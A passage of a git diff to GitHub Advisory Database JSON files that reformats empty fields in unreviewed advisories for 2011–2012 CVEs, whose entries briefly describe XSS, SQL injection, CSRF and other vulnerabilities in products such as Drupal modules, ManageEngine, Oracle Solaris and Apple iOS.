confidentiality, integrity, and availability via unknown vectors related to Web UI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-836w-w693-xm8f/GHSA-836w-w693-xm8f.json b/advisories/unreviewed/2022/05/GHSA-836w-w693-xm8f/GHSA-836w-w693-xm8f.json index 4a0b420b593..c80957987a9 100644 --- a/advisories/unreviewed/2022/05/GHSA-836w-w693-xm8f/GHSA-836w-w693-xm8f.json +++ b/advisories/unreviewed/2022/05/GHSA-836w-w693-xm8f/GHSA-836w-w693-xm8f.json @@ -7,12 +7,8 @@ "CVE-2012-2568" ], "details": "d41d8cd98f00b204e9800998ecf8427e.php in the management web server on the Seagate BlackArmor device allows remote attackers to change the administrator password via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-83cp-2pcw-7rwm/GHSA-83cp-2pcw-7rwm.json b/advisories/unreviewed/2022/05/GHSA-83cp-2pcw-7rwm/GHSA-83cp-2pcw-7rwm.json index 9e525a1be34..36c2d0239c8 100644 --- a/advisories/unreviewed/2022/05/GHSA-83cp-2pcw-7rwm/GHSA-83cp-2pcw-7rwm.json +++ b/advisories/unreviewed/2022/05/GHSA-83cp-2pcw-7rwm/GHSA-83cp-2pcw-7rwm.json @@ -7,12 +7,8 @@ "CVE-2012-0959" ], "details": "Remote Login Service (RLS) 1.0.0 does not properly clear account information when switching users, which might allow physically proximate users to obtain login credentials.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-83vh-mv8c-q8vm/GHSA-83vh-mv8c-q8vm.json b/advisories/unreviewed/2022/05/GHSA-83vh-mv8c-q8vm/GHSA-83vh-mv8c-q8vm.json index d854f4c91bd..5b15e664cc6 100644 --- a/advisories/unreviewed/2022/05/GHSA-83vh-mv8c-q8vm/GHSA-83vh-mv8c-q8vm.json +++ b/advisories/unreviewed/2022/05/GHSA-83vh-mv8c-q8vm/GHSA-83vh-mv8c-q8vm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-83xg-9xxq-j6f5/GHSA-83xg-9xxq-j6f5.json b/advisories/unreviewed/2022/05/GHSA-83xg-9xxq-j6f5/GHSA-83xg-9xxq-j6f5.json index 0ee3ba9f11c..5ecce25e1db 100644 --- a/advisories/unreviewed/2022/05/GHSA-83xg-9xxq-j6f5/GHSA-83xg-9xxq-j6f5.json +++ b/advisories/unreviewed/2022/05/GHSA-83xg-9xxq-j6f5/GHSA-83xg-9xxq-j6f5.json @@ -7,12 +7,8 @@ "CVE-2012-3735" ], "details": "The Passcode Lock implementation in Apple iOS before 6 does not properly interact with the \"Slide to Power Off\" feature, which allows physically proximate attackers to see the most recently used third-party app by watching the device's screen.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8484-g3mc-3mr8/GHSA-8484-g3mc-3mr8.json b/advisories/unreviewed/2022/05/GHSA-8484-g3mc-3mr8/GHSA-8484-g3mc-3mr8.json index 16d56cd3c12..a8bf2435fe7 100644 --- a/advisories/unreviewed/2022/05/GHSA-8484-g3mc-3mr8/GHSA-8484-g3mc-3mr8.json +++ b/advisories/unreviewed/2022/05/GHSA-8484-g3mc-3mr8/GHSA-8484-g3mc-3mr8.json @@ -7,12 +7,8 @@ "CVE-2012-1979" ], "details": "Cross-site scripting (XSS) vulnerability in starnet/index.php in SyndeoCMS 3.0.01 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the email parameter (aka Email address field) in an edit_user configuration action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-84wc-fvf8-mfp7/GHSA-84wc-fvf8-mfp7.json b/advisories/unreviewed/2022/05/GHSA-84wc-fvf8-mfp7/GHSA-84wc-fvf8-mfp7.json index 58c7b14a277..2f21c351abe 100644 --- a/advisories/unreviewed/2022/05/GHSA-84wc-fvf8-mfp7/GHSA-84wc-fvf8-mfp7.json +++ b/advisories/unreviewed/2022/05/GHSA-84wc-fvf8-mfp7/GHSA-84wc-fvf8-mfp7.json @@ -7,12 +7,8 @@ "CVE-2012-2097" ], "details": "Cross-site request forgery (CSRF) vulnerability in the Autosave module 6.x before 6.x-2.10 and 7.x-2.x before 7.x-2.0 for Drupal allows remote attackers to hijack the authentication of arbitrary users for requests involving \"submitting saved results to a node.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-85cc-pv92-m56v/GHSA-85cc-pv92-m56v.json b/advisories/unreviewed/2022/05/GHSA-85cc-pv92-m56v/GHSA-85cc-pv92-m56v.json index 483450cf45f..3fe00b4d1da 100644 --- a/advisories/unreviewed/2022/05/GHSA-85cc-pv92-m56v/GHSA-85cc-pv92-m56v.json +++ b/advisories/unreviewed/2022/05/GHSA-85cc-pv92-m56v/GHSA-85cc-pv92-m56v.json @@ -7,12 +7,8 @@ "CVE-2012-1639" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in product/commerce_product.module in the Drupal Commerce module for Drupal before 7.x-1.2 allow remote authenticated users to inject arbitrary web script or HTML via the (1) sku or (2) title parameters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-868w-34vr-f4r2/GHSA-868w-34vr-f4r2.json b/advisories/unreviewed/2022/05/GHSA-868w-34vr-f4r2/GHSA-868w-34vr-f4r2.json index 1c4a5dcdbb7..5c965d324e2 100644 --- a/advisories/unreviewed/2022/05/GHSA-868w-34vr-f4r2/GHSA-868w-34vr-f4r2.json +++ b/advisories/unreviewed/2022/05/GHSA-868w-34vr-f4r2/GHSA-868w-34vr-f4r2.json @@ -7,12 +7,8 @@ "CVE-2012-1063" ], "details": "Multiple SQL injection vulnerabilities in ManageEngine Applications Manager 9.x and 10.x allow remote attackers to execute arbitrary SQL commands via the (1) viewId parameter to fault/AlarmView.do or (2) period parameter to showHistoryData.do.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-86jr-59gf-89v2/GHSA-86jr-59gf-89v2.json b/advisories/unreviewed/2022/05/GHSA-86jr-59gf-89v2/GHSA-86jr-59gf-89v2.json index f4c22eb3b5c..d64df521521 100644 --- a/advisories/unreviewed/2022/05/GHSA-86jr-59gf-89v2/GHSA-86jr-59gf-89v2.json +++ b/advisories/unreviewed/2022/05/GHSA-86jr-59gf-89v2/GHSA-86jr-59gf-89v2.json @@ -7,12 +7,8 @@ "CVE-2012-1685" ], "details": "Unspecified vulnerability in the Secure Global Desktop component in Oracle Virtualization 4.6 allows remote attackers to affect integrity via unknown vectors related to Core.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-87fr-xmgc-7vgp/GHSA-87fr-xmgc-7vgp.json b/advisories/unreviewed/2022/05/GHSA-87fr-xmgc-7vgp/GHSA-87fr-xmgc-7vgp.json index 1a35d3c5e41..5a175300a6a 100644 --- a/advisories/unreviewed/2022/05/GHSA-87fr-xmgc-7vgp/GHSA-87fr-xmgc-7vgp.json +++ b/advisories/unreviewed/2022/05/GHSA-87fr-xmgc-7vgp/GHSA-87fr-xmgc-7vgp.json @@ -7,12 +7,8 @@ "CVE-2012-1646" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the FAQ module 6.x-1.x before 6.x-1.13 and 7.x-1.x-rc1 for Drupal allow remote authenticated users to inject arbitrary web script or HTML via the (1) title parameter in faq.admin.inc or (2) detailed_question parameter in faq.module.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-885x-vgwh-pfrr/GHSA-885x-vgwh-pfrr.json b/advisories/unreviewed/2022/05/GHSA-885x-vgwh-pfrr/GHSA-885x-vgwh-pfrr.json index 3639cef5534..4611178febe 100644 --- a/advisories/unreviewed/2022/05/GHSA-885x-vgwh-pfrr/GHSA-885x-vgwh-pfrr.json +++ b/advisories/unreviewed/2022/05/GHSA-885x-vgwh-pfrr/GHSA-885x-vgwh-pfrr.json @@ -7,12 +7,8 @@ "CVE-2011-5141" ], "details": "Directory traversal vulnerability in exportcsv/exportcsv_index.php in Open Business Management (OBM) 2.4.0-rc13 and earlier allows remote authenticated users to include and execute arbitrary local files via a .. (dot dot) in the module parameter in an export_page action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8c32-34gf-q623/GHSA-8c32-34gf-q623.json b/advisories/unreviewed/2022/05/GHSA-8c32-34gf-q623/GHSA-8c32-34gf-q623.json index 310585d884a..4525bdccc97 100644 --- a/advisories/unreviewed/2022/05/GHSA-8c32-34gf-q623/GHSA-8c32-34gf-q623.json +++ b/advisories/unreviewed/2022/05/GHSA-8c32-34gf-q623/GHSA-8c32-34gf-q623.json @@ -7,12 +7,8 @@ "CVE-2012-4000" ], "details": "Cross-site scripting (XSS) vulnerability in the print_textinputs_var function in editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php in FCKeditor 2.6.7 and earlier allows remote attackers to inject arbitrary web script or HTML via textinputs array parameters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8c58-cj6j-7593/GHSA-8c58-cj6j-7593.json b/advisories/unreviewed/2022/05/GHSA-8c58-cj6j-7593/GHSA-8c58-cj6j-7593.json index 9824142331e..87304179b10 100644 --- a/advisories/unreviewed/2022/05/GHSA-8c58-cj6j-7593/GHSA-8c58-cj6j-7593.json +++ b/advisories/unreviewed/2022/05/GHSA-8c58-cj6j-7593/GHSA-8c58-cj6j-7593.json @@ -7,12 +7,8 @@ "CVE-2011-5149" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in SpamTitan 5.08 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) testaddr or (2) testpass parameter to auth-settings.php; (3) hostname, (4) domainname, or (5) mailserver parameter to setup-relay.php; or (6) subnetmask or (7) defaultroute parameter to setup-network.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8cj2-jg77-qj2p/GHSA-8cj2-jg77-qj2p.json b/advisories/unreviewed/2022/05/GHSA-8cj2-jg77-qj2p/GHSA-8cj2-jg77-qj2p.json index d1fe37f73a4..7d905bd8ea9 100644 --- a/advisories/unreviewed/2022/05/GHSA-8cj2-jg77-qj2p/GHSA-8cj2-jg77-qj2p.json +++ b/advisories/unreviewed/2022/05/GHSA-8cj2-jg77-qj2p/GHSA-8cj2-jg77-qj2p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8crx-gwv5-ffh5/GHSA-8crx-gwv5-ffh5.json b/advisories/unreviewed/2022/05/GHSA-8crx-gwv5-ffh5/GHSA-8crx-gwv5-ffh5.json index 52a69d4ddd8..2cc477cd736 100644 --- a/advisories/unreviewed/2022/05/GHSA-8crx-gwv5-ffh5/GHSA-8crx-gwv5-ffh5.json +++ b/advisories/unreviewed/2022/05/GHSA-8crx-gwv5-ffh5/GHSA-8crx-gwv5-ffh5.json @@ -7,12 +7,8 @@ "CVE-2012-2906" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in artpublic/recommandation/index.php in Artiphp CMS 5.5.0 Neo (r422) allow remote attackers to inject arbitrary web script or HTML via the (1) add_img_name_post, (2) asciiart_post, (3) expediteur, (4) titre_sav, or (5) z39d27af885b32758ac0e7d4014a61561 parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8f77-wf6x-fv8m/GHSA-8f77-wf6x-fv8m.json b/advisories/unreviewed/2022/05/GHSA-8f77-wf6x-fv8m/GHSA-8f77-wf6x-fv8m.json index 3409f82dcd9..35873ed503f 100644 --- a/advisories/unreviewed/2022/05/GHSA-8f77-wf6x-fv8m/GHSA-8f77-wf6x-fv8m.json +++ b/advisories/unreviewed/2022/05/GHSA-8f77-wf6x-fv8m/GHSA-8f77-wf6x-fv8m.json @@ -7,12 +7,8 @@ "CVE-2011-5160" ], "details": "Cross-site scripting (XSS) vulnerability in setup.php in OpenEMR 4 allows remote attackers to inject arbitrary web script or HTML via the site parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8ffj-gcr2-r5wm/GHSA-8ffj-gcr2-r5wm.json b/advisories/unreviewed/2022/05/GHSA-8ffj-gcr2-r5wm/GHSA-8ffj-gcr2-r5wm.json index cb5aecb4175..9a273263594 100644 --- a/advisories/unreviewed/2022/05/GHSA-8ffj-gcr2-r5wm/GHSA-8ffj-gcr2-r5wm.json +++ b/advisories/unreviewed/2022/05/GHSA-8ffj-gcr2-r5wm/GHSA-8ffj-gcr2-r5wm.json @@ -7,12 +7,8 @@ "CVE-2012-1626" ], "details": "SQL injection vulnerability in the conversion form for Events in the Date module 6.x-2.x before 6.x-2.8 for Drupal allows remote authenticated users with the \"administer Date Tools\" privilege to execute arbitrary SQL commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8gc9-8wj3-2rqj/GHSA-8gc9-8wj3-2rqj.json b/advisories/unreviewed/2022/05/GHSA-8gc9-8wj3-2rqj/GHSA-8gc9-8wj3-2rqj.json index cd7b27cd8b2..8be4e701318 100644 --- a/advisories/unreviewed/2022/05/GHSA-8gc9-8wj3-2rqj/GHSA-8gc9-8wj3-2rqj.json +++ b/advisories/unreviewed/2022/05/GHSA-8gc9-8wj3-2rqj/GHSA-8gc9-8wj3-2rqj.json @@ -7,12 +7,8 @@ "CVE-2012-3901" ], "details": "The updateTime function in sensorApp on Cisco IPS 4200 series sensors 7.0 and 7.1 allows remote attackers to cause a denial of service (process crash and traffic-inspection outage) via network traffic, aka Bug ID CSCta96144.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8h28-5hcj-h4qw/GHSA-8h28-5hcj-h4qw.json b/advisories/unreviewed/2022/05/GHSA-8h28-5hcj-h4qw/GHSA-8h28-5hcj-h4qw.json index fcc503a9e65..4300408ddea 100644 --- a/advisories/unreviewed/2022/05/GHSA-8h28-5hcj-h4qw/GHSA-8h28-5hcj-h4qw.json +++ b/advisories/unreviewed/2022/05/GHSA-8h28-5hcj-h4qw/GHSA-8h28-5hcj-h4qw.json @@ -7,12 +7,8 @@ "CVE-2012-2147" ], "details": "munin-cgi-graph in Munin 2.0 rc4 allows remote attackers to cause a denial of service (disk or memory consumption) via many image requests with large values in the (1) size_x or (2) size_y parameters.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8jhg-mc33-hhc5/GHSA-8jhg-mc33-hhc5.json b/advisories/unreviewed/2022/05/GHSA-8jhg-mc33-hhc5/GHSA-8jhg-mc33-hhc5.json index 16dc7a4dd85..5763bdb613c 100644 --- a/advisories/unreviewed/2022/05/GHSA-8jhg-mc33-hhc5/GHSA-8jhg-mc33-hhc5.json +++ b/advisories/unreviewed/2022/05/GHSA-8jhg-mc33-hhc5/GHSA-8jhg-mc33-hhc5.json @@ -7,12 +7,8 @@ "CVE-2012-3304" ], "details": "The Administrative Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before 7.0.0.25, 8.0 before 8.0.0.5, and 8.5 before 8.5.0.1 allows remote attackers to hijack sessions via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8mf3-mg88-jjf7/GHSA-8mf3-mg88-jjf7.json b/advisories/unreviewed/2022/05/GHSA-8mf3-mg88-jjf7/GHSA-8mf3-mg88-jjf7.json index b1a58ba3b64..b01211febdd 100644 --- a/advisories/unreviewed/2022/05/GHSA-8mf3-mg88-jjf7/GHSA-8mf3-mg88-jjf7.json +++ b/advisories/unreviewed/2022/05/GHSA-8mf3-mg88-jjf7/GHSA-8mf3-mg88-jjf7.json @@ -7,12 +7,8 @@ "CVE-2012-1655" ], "details": "Unspecified vulnerability in the UC PayDutchGroup / WeDeal payment module 6.x-1.0 for Drupal allows remote authenticated users to obtain account credentials via unknown attack vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8q9c-q4vf-f8rj/GHSA-8q9c-q4vf-f8rj.json b/advisories/unreviewed/2022/05/GHSA-8q9c-q4vf-f8rj/GHSA-8q9c-q4vf-f8rj.json index 7f267d1f467..b360a04a676 100644 --- a/advisories/unreviewed/2022/05/GHSA-8q9c-q4vf-f8rj/GHSA-8q9c-q4vf-f8rj.json +++ b/advisories/unreviewed/2022/05/GHSA-8q9c-q4vf-f8rj/GHSA-8q9c-q4vf-f8rj.json @@ -7,12 +7,8 @@ "CVE-2012-3121" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 9 and 10 allows remote attackers to affect availability via unknown vectors related to in.tnamed and NameServer.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8qp8-cphr-rp5h/GHSA-8qp8-cphr-rp5h.json b/advisories/unreviewed/2022/05/GHSA-8qp8-cphr-rp5h/GHSA-8qp8-cphr-rp5h.json index 045e5574250..72dc4f9cafd 100644 --- a/advisories/unreviewed/2022/05/GHSA-8qp8-cphr-rp5h/GHSA-8qp8-cphr-rp5h.json +++ b/advisories/unreviewed/2022/05/GHSA-8qp8-cphr-rp5h/GHSA-8qp8-cphr-rp5h.json @@ -7,12 +7,8 @@ "CVE-2012-3742" ], "details": "Safari in Apple iOS before 6 does not properly restrict use of an unspecified Unicode character that looks similar to the https lock indicator, which allows remote attackers to spoof https connections by placing this character in the TITLE element of a web page.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8qrr-wcp7-x4jq/GHSA-8qrr-wcp7-x4jq.json b/advisories/unreviewed/2022/05/GHSA-8qrr-wcp7-x4jq/GHSA-8qrr-wcp7-x4jq.json index 847943a96e2..5f31b2d41e6 100644 --- a/advisories/unreviewed/2022/05/GHSA-8qrr-wcp7-x4jq/GHSA-8qrr-wcp7-x4jq.json +++ b/advisories/unreviewed/2022/05/GHSA-8qrr-wcp7-x4jq/GHSA-8qrr-wcp7-x4jq.json @@ -7,12 +7,8 @@ "CVE-2012-2903" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in PHP Address Book 7.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) PATH_INFO to group.php, or the (2) target_language or (3) target_flag parameter to translate.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8qv7-h8f9-66xr/GHSA-8qv7-h8f9-66xr.json b/advisories/unreviewed/2022/05/GHSA-8qv7-h8f9-66xr/GHSA-8qv7-h8f9-66xr.json index 8a622df9b40..307f7a4938d 100644 --- a/advisories/unreviewed/2022/05/GHSA-8qv7-h8f9-66xr/GHSA-8qv7-h8f9-66xr.json +++ b/advisories/unreviewed/2022/05/GHSA-8qv7-h8f9-66xr/GHSA-8qv7-h8f9-66xr.json @@ -7,12 +7,8 @@ "CVE-2012-2308" ], "details": "Cross-site scripting (XSS) vulnerability in the Taxonomy Grid : Catalog module for Drupal 6.x-1.6 and earlier allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8qxh-5rrf-mrg7/GHSA-8qxh-5rrf-mrg7.json b/advisories/unreviewed/2022/05/GHSA-8qxh-5rrf-mrg7/GHSA-8qxh-5rrf-mrg7.json index 0d79c3068e5..ac3999b5da6 100644 --- a/advisories/unreviewed/2022/05/GHSA-8qxh-5rrf-mrg7/GHSA-8qxh-5rrf-mrg7.json +++ b/advisories/unreviewed/2022/05/GHSA-8qxh-5rrf-mrg7/GHSA-8qxh-5rrf-mrg7.json @@ -7,12 +7,8 @@ "CVE-2012-0732" ], "details": "The Enterprise Console client in IBM Rational AppScan Enterprise 5.x and 8.x before 8.5.0.1 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8rw3-9ghr-xp9p/GHSA-8rw3-9ghr-xp9p.json b/advisories/unreviewed/2022/05/GHSA-8rw3-9ghr-xp9p/GHSA-8rw3-9ghr-xp9p.json index d052af757a8..0d2b2b4f62e 100644 --- a/advisories/unreviewed/2022/05/GHSA-8rw3-9ghr-xp9p/GHSA-8rw3-9ghr-xp9p.json +++ b/advisories/unreviewed/2022/05/GHSA-8rw3-9ghr-xp9p/GHSA-8rw3-9ghr-xp9p.json @@ -7,12 +7,8 @@ "CVE-2012-1308" ], "details": "Cross-site request forgery (CSRF) vulnerability in redpass.cgi in D-Link DSL-2640B Firmware EU_4.00 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via the sysPassword parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8v22-r255-jc2m/GHSA-8v22-r255-jc2m.json b/advisories/unreviewed/2022/05/GHSA-8v22-r255-jc2m/GHSA-8v22-r255-jc2m.json index a5ff6b83870..7990d012b6d 100644 --- a/advisories/unreviewed/2022/05/GHSA-8v22-r255-jc2m/GHSA-8v22-r255-jc2m.json +++ b/advisories/unreviewed/2022/05/GHSA-8v22-r255-jc2m/GHSA-8v22-r255-jc2m.json @@ -7,12 +7,8 @@ "CVE-2012-1062" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Applications Manager 9.x and 10.x allow remote attackers to inject arbitrary web script or HTML via the (1) period parameter to showHistoryData.do; (2) selectedNetwork, (3) network, or (4) group parameters to showresource.do; (5) header parameter to AlarmView.do; or (6) attName parameter to jsp/PopUp_Graph.jsp. NOTE: the Search.do/query vector is already covered by CVE-2008-1566, and the jsp/ThresholdActionConfiguration.jsp redirectto vector is already covered by CVE-2008-0474.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8v3w-hxrw-97f7/GHSA-8v3w-hxrw-97f7.json b/advisories/unreviewed/2022/05/GHSA-8v3w-hxrw-97f7/GHSA-8v3w-hxrw-97f7.json index 02225bf63d2..f5423be83db 100644 --- a/advisories/unreviewed/2022/05/GHSA-8v3w-hxrw-97f7/GHSA-8v3w-hxrw-97f7.json +++ b/advisories/unreviewed/2022/05/GHSA-8v3w-hxrw-97f7/GHSA-8v3w-hxrw-97f7.json @@ -7,12 +7,8 @@ "CVE-2012-1752" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 11 allows local users to affect availability, related to Kernel/NFS.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8v9j-x5gc-mg8x/GHSA-8v9j-x5gc-mg8x.json b/advisories/unreviewed/2022/05/GHSA-8v9j-x5gc-mg8x/GHSA-8v9j-x5gc-mg8x.json index a50d14a0dda..1df01c2e259 100644 --- a/advisories/unreviewed/2022/05/GHSA-8v9j-x5gc-mg8x/GHSA-8v9j-x5gc-mg8x.json +++ b/advisories/unreviewed/2022/05/GHSA-8v9j-x5gc-mg8x/GHSA-8v9j-x5gc-mg8x.json @@ -7,12 +7,8 @@ "CVE-2012-2315" ], "details": "admin/Auth in OpenKM 5.1.7 and other versions before 5.1.8-2 does not properly enforce privileges for changing user roles, which allows remote authenticated users to assign administrator privileges to arbitrary users via the userEdit action.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-8wg2-73cr-jv3q/GHSA-8wg2-73cr-jv3q.json b/advisories/unreviewed/2022/05/GHSA-8wg2-73cr-jv3q/GHSA-8wg2-73cr-jv3q.json index 0f917651933..26dda58a3a2 100644 --- a/advisories/unreviewed/2022/05/GHSA-8wg2-73cr-jv3q/GHSA-8wg2-73cr-jv3q.json +++ b/advisories/unreviewed/2022/05/GHSA-8wg2-73cr-jv3q/GHSA-8wg2-73cr-jv3q.json @@ -7,12 +7,8 @@ "CVE-2012-3569" ], "details": "Format string vulnerability in VMware OVF Tool 2.1 on Windows, as used in VMware Workstation 8.x before 8.0.5, VMware Player 4.x before 4.0.5, and other products, allows user-assisted remote attackers to execute arbitrary code via a crafted OVF file.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8xcw-9xw7-485h/GHSA-8xcw-9xw7-485h.json b/advisories/unreviewed/2022/05/GHSA-8xcw-9xw7-485h/GHSA-8xcw-9xw7-485h.json index db1a13d727b..02cf46d5e3b 100644 --- a/advisories/unreviewed/2022/05/GHSA-8xcw-9xw7-485h/GHSA-8xcw-9xw7-485h.json +++ b/advisories/unreviewed/2022/05/GHSA-8xcw-9xw7-485h/GHSA-8xcw-9xw7-485h.json @@ -7,12 +7,8 @@ "CVE-2012-0983" ], "details": "SQL injection vulnerability in Scriptsez.net Ez Album allows remote attackers to execute arbitrary SQL commands via the id parameter in a view action to index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-8xxq-466x-jmgf/GHSA-8xxq-466x-jmgf.json b/advisories/unreviewed/2022/05/GHSA-8xxq-466x-jmgf/GHSA-8xxq-466x-jmgf.json index e54e62fb306..11eb2078589 100644 --- a/advisories/unreviewed/2022/05/GHSA-8xxq-466x-jmgf/GHSA-8xxq-466x-jmgf.json +++ b/advisories/unreviewed/2022/05/GHSA-8xxq-466x-jmgf/GHSA-8xxq-466x-jmgf.json @@ -7,12 +7,8 @@ "CVE-2012-3311" ], "details": "IBM WebSphere Application 